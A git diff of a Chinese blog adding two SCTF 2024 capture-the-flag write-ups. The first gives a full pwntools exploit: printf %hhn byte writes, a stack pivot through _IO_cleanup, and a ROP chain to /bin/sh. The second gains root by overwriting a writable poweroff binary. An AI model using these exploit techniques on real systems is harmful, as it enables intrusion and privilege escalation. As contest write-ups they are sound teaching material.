RocketMaDev
diff --git a/‎source/_posts/dasx0rays2024/ChromeLogger.md
+1 b/‎source/_posts/dasx0rays2024/ChromeLogger.md
+1
diff --git a/‎source/_posts/dasx0rays2024/WhereIsMySauce.md
+1 b/‎source/_posts/dasx0rays2024/WhereIsMySauce.md
+1
diff --git a/‎source/_posts/sctf2024/GoCompiler.md
+187 b/‎source/_posts/sctf2024/GoCompiler.md
+187
diff --git a/‎source/_posts/sctf2024/kno_puts.md
+45 b/‎source/_posts/sctf2024/kno_puts.md
+45
@@ -11,6 +11,7 @@ tags:
 sticky: 99
 thumbnail: /assets/dasx0rays2024/logo.png
 ---
+<!-- excerpt -->
 
 当你看到这篇博客的时候，安恒官方的wp应该已经放出了，你也大概是因为看到了wp中夹带的网址而来，
 并且是有一定基础的pwner，来都来了，可以在评论区中尽情吐槽。说实话，
 
@@ -6,6 +6,7 @@ tags:
     - tricks
 sticky: 90
 ---
+<!-- excerpt -->
 
 ## 前言
 
 
@@ -0,0 +1,187 @@
+---
+title: sctf2024 - GoCompiler
+date: 2024/10/22 13:49:00
+updated: 2024/10/27 10:31:00
+tags:
+    - go
+    - fmt-string
+    - rop
+thumbnail: /assets/sctf2024/bss.png
+excerpt: 利用Go语言编译器中的`printf`漏洞，通过`%hhn`逐字节修改内存，实现ROP链，最终执行`/bin/sh`以获得shell。
+---
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |amd64 |
+|RELRO |No    |
+|Canary|off   |
+|NX    |on    |
+|PIE   |off   |
+|strip |no    |
+|go    |1.20.3|
+
+## 解题思路
+
+用go写的go语言编译器，可以将go转换为汇编并用gcc编译，看调试信息写到了
+**github.com/klang/ugo** ，但实际上无法访问，不过看项目有点类似于已经公开的“凹语言”，
+可是实际测试对go的支持十分有限。
+
+go的逆向太困难了，一些函数调用根本看不出来做了什么操作，通过看函数名和rr测试，
+发现了`ugo`允许调用C语言的函数，但仅限于`write`和`printf`，并且`printf`的格式化参数有限制，
+必须包含且仅包含一个`%`符号。
+
+{% notel green fa-screwdriver-wrench 时间无关调试工具：rr %}
+rr是Mozilla开发的一个调试工具，可以实现 **timeless debug** ，也就是说，
+它通过提前录制程序行为，稍后就可以回放程序，实现“逆向调试”。不过你也注意到了，
+你并不是在真正调试程序，你只是在回溯程序的行为。但是借助这个特性，我们可以面对go这种难调的家伙，
+通过定位确定的错误点，一步一步逆向推导，就可以猜测出程序的行为，相较静态检查多了灵活性。
+这次的很多发现，包括`printf`的行为，都是我通过rr看出来的。
+{% endnotel %}
+
+由于有了`printf`原语，我们可以通过`%hhn`来一个字节一个字节改内存。并且由于结果程序是无PIE的，
+我们可以直接修改bss区的内容。
+
+{% note purple fa-circle-arrow-right %}
+不使用`%hn`等是因为由于只能用1个%，用`%hn`写数据需要堆砌大量的无效字符，
+最终会导致程序过大，因此`%hhn`是权衡过后的更佳选择。
+{% endnote %}
+
+接下来我们就可以利用如下原语，将payload注入到`INSERT`处，
+反复调用`printf('1' * n, addr)`的方式来任意写
+
+```go malicious.ugo
+package main
+
+func main() int {
+    var i int = 0
+        INSERT
+    return 0
+}
+```
+
+任意写有了，写什么好呢？原本我的想法是打apple，但奈何apple实在是太长了，
+并且程序中也没有`system`，于是我找了找其他的函数指针，结果发现了在`exit`中调用了一处指针，
+原先这个地方是`_IO_cleanup`，但是这个地方是可写的，且没有受`PTR_MANGLE`加密，
+可以直接劫持。看了一下调用时的寄存器状态，此时正`call rbx`，因此rbx刚好是这个指针的地址，
+是我们可以控制的，然后就是找gadget了。
+
+经过令人近乎绝望的查找，我最终锁定了一个gadget：`mov esp, ebx; mov rbx, qword ptr [rsp]; add rsp, 0x30; ret`，
+由于没有PIE，因此可以做栈迁移到`ebx + 0x30`上！我只要将数据写到`ebx + 0x30`的地址上，
+就可以实现rop，只要构造`syscall(SYS_execve, "/bin/sh", NULL, NULL)`就可以拿到shell。
+
+{% note purple fa-circle-arrow-right %}
+`ebx + 0x30`的地方并不是可以任意写的，在调`_IO_cleanup`之前，会先运行`__exit_funcs`中的hook，
+调用`call_fini -> __preinit_array_start -> __do_global_dtor_aux -> __deregister_frame_info_bases`，
+在最后一个函数中会判断`object+24`是不是`&__EH_FRAME_BEGIN__`，如果不是则会继续迭代，
+导致发生SIGSEGV，而`object`刚好在`ebx + 0x30`不远处，还需要绕过这个地方。
+
+![bssStatus](/assets/sctf2024/bss.png)
+{% endnote %}
+
+剩下的就是先把payload伪造好，交给容器里的gcc编译，这样由于payload长度固定，生成出来的gadget位置基本也不会变，
+执行就可以获取shell了
+
+{% note default fa-ban %}
+原先的方案是声明字符串的，由于llvm的特性，声明的字符串会在程序中保留一份，因此"/bin/sh"可以借此获取，
+不过大概是由于程序中有太多字符串了，因此每次调整payload，即使长度没有变化，字符串的地址也会变化。
+最后选择了把"/bin/sh"直接写到了bss上固定位置。
+{% endnote %}
+
+## EXPLOIT
+
+```python
+from pwn import *
+import os
+context.terminal = ['tmux','splitw','-h']
+EXE = './hello'
+
+def mkstr(val: int) -> str:
+    return '1' * val
+
+def w1byte(addr: int, val: int) -> str:
+    return f'   i = {addr:#x}\n    printf("{mkstr(val)}%hhn", i)\n'
+
+def wnbytes(n: int, addr: int, val: int) -> str:
+    base = ''
+    for i in range(n):
+        base += w1byte(addr + i, (val >> (i * 8)) & 0xff)
+    return base
+
+def create_ugo():
+    with open('hello.ugo', 'r') as goin:
+        base = goin.read()
+    ugo = ''
+    ugo += wnbytes(4, 0x4c8288, 0x484a8e) # mov esp, ebx
+    ugo += wnbytes(7, 0x4c8298, u64(b'/bin/sh\0')) # /bin/sh
+    ugo += wnbytes(4, 0x4c82b8, 0x4020df) # pop rdi
+    ugo += wnbytes(8, 0x4c82c0, 0x4c8298) # "/bin/sh"
+    ugo += wnbytes(4, 0x4c82c8, 0x485acb) # pop rdx => 0; pop rbx <- check;
+    ugo += wnbytes(4, 0x4c82e0, 0x44fd47) # pop rax
+    ugo += wnbytes(1, 0x4c82e8, 59)       # 59
+    ugo += wnbytes(4, 0x4c82f0, 0x401e94) # syscall
+    with open('malicious.ugo', 'w') as goout:
+        goout.write(base.replace('INSERT', ugo))
+    
+def payload(lo:int):
+    global sh
+    if lo:
+        sh = process(EXE)
+    else:
+        sh = remote('1.95.58.58', 2102)
+
+    creating = True
+    if os.path.exists('malicious.ugo'):
+        ch = input('malicious.ugo exists. Regenerate? [y/n]')
+        if ch == 'n' or ch == '':
+            creating = False
+    if creating:
+        info('Generate malicious.ugo.')
+        create_ugo()
+
+    if not lo:
+        with open('malicious.ugo', 'r') as mal:
+            src = mal.read()
+        sh.sendline(src.encode() + b'end')
+
+    sh.clean()
+    sh.interactive()
+    sh.close()
+```
+
+{% note default fa-flag %}
+![flag](/assets/sctf2024/goFlag.png)
+{% endnote %}
+
+## 尾声
+
+比赛结束后，看别人的wp，都没有用到`printf`，都是通过`write`溢出打印指针，然后走栈溢出rop
+（给了栈溢出示例，但是我没有编译运行）
+
+除此之外，本次exp用到的改的`&_IO_cleanup`，即`__elf_set___libc_atexit_element__IO_cleanup__`，
+是可写的，却从未看到有人这么利用过，拿做过的题看了一下，从libc 2.23到2.35，虽然有这个符号，
+但它位于只读段，没有利用价值...甚至在2.38之后这个符号直接被删掉了，
+`exit`固定会调用`_IO_cleanup`。只能说运气好，静态编译把这个符号变成可写的了。
+
+还有一个比较神奇的特性是当程序静态链接后，tls会使用`malloc`分配出来，因为没有libc可挂
+
+<img src="/assets/sctf2024/tls.png" height="90%" width="90%">
+
+之后有一天我上网看看别人博客有没有更新，结果看到了[原作者的博客](https://ywhkkx.github.io/2024/04/12/ugo-lab1-%E6%9C%80%E5%B0%8FuGo%E7%A8%8B%E5%BA%8F/)
+
+{% note blue fa-info %}
+Ghidra的go插件能够恢复部分编译时的信息，包括源代码位置，因此可以清楚看到作者是
+**yhellow**，还可以看到他的仓库里有Syclover的内容，肯定没错了。
+
+<img src="/assets/sctf2024/author.png" height="10%" width="10%">
+<img src="/assets/sctf2024/decompile.png" height="50%" width="50%">
+<img src="/assets/sctf2024/proof.png" height="60%" width="60%">
+{% endnote %}
+
+看来pwn也可做信息收集啊。~~不过里面写的demo和题目的匹配度不是特别高~~
+
+## 参考
+
+1. [rr: Record and Replay Framework](https://github.com/rr-debugger/rr)
+2. [ugo-lab1-最小uGo程序](https://ywhkkx.github.io/2024/04/12/ugo-lab1-%E6%9C%80%E5%B0%8FuGo%E7%A8%8B%E5%BA%8F/)
@@ -0,0 +1,45 @@
+---
+title: sctf2024 - kno_puts
+date: 2024/10/22 00:42:00
+updated: 2024/10/27 11:21:00
+tags:
+    - shell jail
+excerpt: 通过替换可写的`poweroff`命令为`cat /flag`，在以1000身份运行的shell结束后成功用root的身份获取flag。
+---
+
+文件系统权限没设置好，非预期了。root启动`init`脚本，随后以1000身份将shell暴露给用户，
+在shell运行结束后执行`poweroff`。结果`poweroff`是可写的，将其替换为`cat /flag` 后`exit`就可以拿flag
+
+```bash /init
+...
+chmod 400 flag
+insmod /test.ko
+mknod -m 666 /dev/ksctf c `grep ksctf /proc/devices | awk '{print $1;}'` 0 
+setsid /bin/cttyhack setuidgid 1000 /bin/sh 
+poweroff -d 600 -f
+```
+
+```bash
+$ which poweroff
+/sbin/poweroff
+$ ls -ld sbin 
+drwxr-xr-x    2 1000     1000          1480 Sep 26 04:41 sbin
+$ ls -l sbin/poweroff  
+lrwxrwxrwx    1 1000     1000            14 Sep 26 18:02 sbin/poweroff -> ../bin/busybox
+$ rm sbin/poweroff
+$ echo 'cat /flag' > /sbin/poweroff
+$ chmod +x /sbin/poweroff
+$ exit
+```
+
+{% note default fa-flag %}
+![flag](/assets/sctf2024/kerFlag.png)
+{% endnote %}
+
+> 预期解好像考到缺页错误引发的暂停，有点超出我的知识范畴了
+
+看到了qanux师傅的一题5解，吓了一跳，太强了Orz
+
+## 参考
+
+[一题多解 SCTF 2024 kno_puts revenge](https://qanux.github.io/2024/10/07/kno_puts/)